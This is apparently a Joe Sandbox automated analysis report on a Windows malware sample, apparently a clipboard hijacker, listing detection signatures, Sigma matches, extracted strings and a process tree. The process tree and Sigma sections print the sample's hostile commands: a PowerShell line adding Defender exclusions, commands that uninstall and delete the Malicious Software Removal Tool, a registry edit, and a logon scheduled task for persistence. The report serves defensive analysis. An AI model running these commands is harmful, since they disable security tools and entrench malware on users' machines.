Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe

Overview

General Information

Sample name:SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe
Analysis ID:1543318
MD5:330709f05491b4e01ddf2af087d4e4f3
SHA1:0f94e0f3f7ef87df645847f84a94572192f5fc39
SHA256:3fa9bb2dffef3935ed2795dace89eec65270bd22a71e365ec1f55e0bf301fab5
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Adds a directory exclusion to Windows Defender
Creates an undocumented autostart registry key
Drops large PE files
Found direct / indirect Syscall (likely to bypass EDR)
Loading BitLocker PowerShell Module
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
Changes image file execution options
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry

Classification

Process Tree

  • System is w10x64native
  • SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe (PID: 1792 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe" MD5: 330709F05491B4E01DDF2AF087D4E4F3)
    • powershell.exe (PID: 2172 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath @($env:ProgramData, 'C:\Users\Public') -ExclusionExtension '.exe' -Force" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • WmiPrvSE.exe (PID: 2844 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • cmd.exe (PID: 5084 cmdline: "cmd.exe" /c "wusa /uninstall /kb:890830 /quiet /norestart" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • wusa.exe (PID: 7004 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: E43499EE2B4CF328A81BACE9B1644C5D)
    • cmd.exe (PID: 4076 cmdline: "cmd.exe" /c "del /f /q %SystemRoot%\System32\MRT.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6440 cmdline: "cmd.exe" /c "reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • reg.exe (PID: 5504 cmdline: reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
    • SppExtComObj.exe (PID: 6848 cmdline: "C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe" MD5: 43D7DA08F086122E16773B9002C05B1F)
    • SgrmBroker.exe (PID: 7500 cmdline: "C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe" MD5: B22A88CB0DDC70FA01E392173505458C)
      • cmd.exe (PID: 7928 cmdline: "cmd.exe" /c "schtasks /Create /TR C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /F /RL highest" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • schtasks.exe (PID: 8096 cmdline: schtasks /Create /TR C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /F /RL highest MD5: 796B784E98008854C27F4B18D287BA30)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Execution from Suspicious Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe", CommandLine: "C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe", CommandLine|base64offset|contains: , Image: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe, NewProcessName: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe, OriginalFileName: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, ParentProcessId: 1792, ParentProcessName: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, ProcessCommandLine: "C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe", ProcessId: 6848, ProcessName: SppExtComObj.exe
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "cmd.exe" /c "schtasks /Create /TR C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /F /RL highest", CommandLine: "cmd.exe" /c "schtasks /Create /TR C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /F /RL highest", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe", ParentImage: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe, ParentProcessId: 7500, ParentProcessName: SgrmBroker.exe, ProcessCommandLine: "cmd.exe" /c "schtasks /Create /TR C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /F /RL highest", ProcessId: 7928, ProcessName: cmd.exe
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "cmd.exe" /c "schtasks /Create /TR C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /F /RL highest", CommandLine: "cmd.exe" /c "schtasks /Create /TR C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /F /RL highest", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe", ParentImage: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe, ParentProcessId: 7500, ParentProcessName: SgrmBroker.exe, ProcessCommandLine: "cmd.exe" /c "schtasks /Create /TR C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /F /RL highest", ProcessId: 7928, ProcessName: cmd.exe
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath @($env:ProgramData, 'C:\Users\Public') -ExclusionExtension '.exe' -Force", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath @($env:ProgramData, 'C:\Users\Public') -ExclusionExtension '.exe' -Force", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, ParentProcessId: 1792, ParentProcessName: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath @($env:ProgramData, 'C:\Users\Public') -ExclusionExtension '.exe' -Force", ProcessId: 2172, ProcessName: powershell.exe
Sigma detected: CurrentVersion NT Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 1099466887, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, ProcessId: 1792, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tcpview.exe\MinimumStackCommitInBytes
Sigma detected: Powershell Defender Exclusion
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath @($env:ProgramData, 'C:\Users\Public') -ExclusionExtension '.exe' -Force", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath @($env:ProgramData, 'C:\Users\Public') -ExclusionExtension '.exe' -Force", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, ParentProcessId: 1792, ParentProcessName: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath @($env:ProgramData, 'C:\Users\Public') -ExclusionExtension '.exe' -Force", ProcessId: 2172, ProcessName: powershell.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath @($env:ProgramData, 'C:\Users\Public') -ExclusionExtension '.exe' -Force", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath @($env:ProgramData, 'C:\Users\Public') -ExclusionExtension '.exe' -Force", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, ParentProcessId: 1792, ParentProcessName: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath @($env:ProgramData, 'C:\Users\Public') -ExclusionExtension '.exe' -Force", ProcessId: 2172, ProcessName: powershell.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeReversingLabs: Detection: 21%
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: sunshine_clipper.pdb source: SgrmBroker.exe, 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp, SgrmBroker.exe, 00000018.00000000.2352610812.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: gametoolset.pdb source: SppExtComObj.exe, 00000017.00000000.2292286211.00007FF68609E000.00000002.00000001.01000000.00000008.sdmp, SppExtComObj.exe, 00000017.00000002.2572042733.00007FF68609E000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: sunshine_clipper.pdbHG source: SgrmBroker.exe, 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp, SgrmBroker.exe, 00000018.00000000.2352610812.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1683814431.00000245B10D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicK
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1675392956.00000245B1310000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1725977931.00000245B1212000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2437747374.00000236ACC78000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2404141053.00000236ACC78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1675392956.00000245B1310000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1725977931.00000245B1212000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2437747374.00000236ACC78000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2404141053.00000236ACC78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt05
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1675087516.00000245B10C3000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2410579033.00000236ACB03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: powershell.exe, 0000000C.00000002.1965404029.000002139A1D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 0000000C.00000002.1965404029.000002139A1D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1675392956.00000245B1310000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1725977931.00000245B1212000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1675087516.00000245B10C3000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2410579033.00000236ACB03000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2437747374.00000236ACC78000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2404141053.00000236ACC78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: powershell.exe, 0000000C.00000002.1959923759.0000021392240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1675392956.00000245B1310000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1725977931.00000245B1212000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1675087516.00000245B10C3000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2410579033.00000236ACB03000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2437747374.00000236ACC78000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2404141053.00000236ACC78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1675087516.00000245B10C3000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2410579033.00000236ACB03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: SgrmBroker.exe, 00000018.00000003.2410579033.00000236ACB03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crl
Source: powershell.exe, 0000000C.00000002.1942235658.00000213823FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000C.00000002.1942235658.00000213823FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXzy
Source: powershell.exe, 0000000C.00000002.1967236251.000002139A336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microsoft.c
Source: powershell.exe, 0000000C.00000002.1942235658.00000213823FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000C.00000002.1942235658.00000213821D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000C.00000002.1942235658.00000213823FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000C.00000002.1942235658.00000213823FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000C.00000002.1942235658.00000213823FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXzy
Source: powershell.exe, 0000000C.00000002.1967642062.000002139A4FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 0000000C.00000002.1942235658.00000213821D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: SgrmBroker.exe, 00000018.00000003.2404141053.00000236ACC5F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2437747374.00000236ACCAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/news/BreakingNews_72x72.svg
Source: powershell.exe, 0000000C.00000002.1959923759.0000021392240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000C.00000002.1959923759.0000021392240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000C.00000002.1959923759.0000021392240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: SppExtComObj.exe, 00000017.00000002.2572042733.00007FF68609E000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://docs.rs/rustls/latest/rustls/manual/_03_howto/index.html#unexpected-eof
Source: SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gameplayapi.intel.com/api/games/downloadthumbnail/
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C6000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gameplayapi.intel.com/api/games/downloadthumbnail/.dllY
Source: SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gameplayapi.intel.com/api/games/getagsgames2/
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C6000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gameplayapi.intel.com/api/games/getagsgames2/H
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C6000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gameplayapi.intel.com/api/games/getagsgames2/P
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1728213124.00000245B11E6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C0000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC28000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACDFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gameplayapi.intel.com/api/games/getagsgames2/Y
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C6000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gameplayapi.intel.com/api/games/getagsgames2/y
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12E1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1728213124.00000245B11E6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C6000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC28000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACDFE000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gameplayapi.intel.com/api/games/getagsgamesettings2/
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12E1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gameplayapi.intel.com/api/games/getagsgamesettings2/B
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12E1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gameplayapi.intel.com/api/games/getagsgamesettings2/j
Source: powershell.exe, 0000000C.00000002.1942235658.00000213823FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000C.00000002.1942235658.00000213823FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXzy
Source: powershell.exe, 0000000C.00000002.1967642062.000002139A4FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
Source: powershell.exe, 0000000C.00000002.1959923759.0000021392240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tst-gameplayapi.intel.com/api/games/downloadthumbnail/
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12E1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tst-gameplayapi.intel.com/api/games/downloadthumbnail/B
Source: SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tst-gameplayapi.intel.com/api/games/downloadthumbnail/R
Source: SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tst-gameplayapi.intel.com/api/games/getagsgames2/
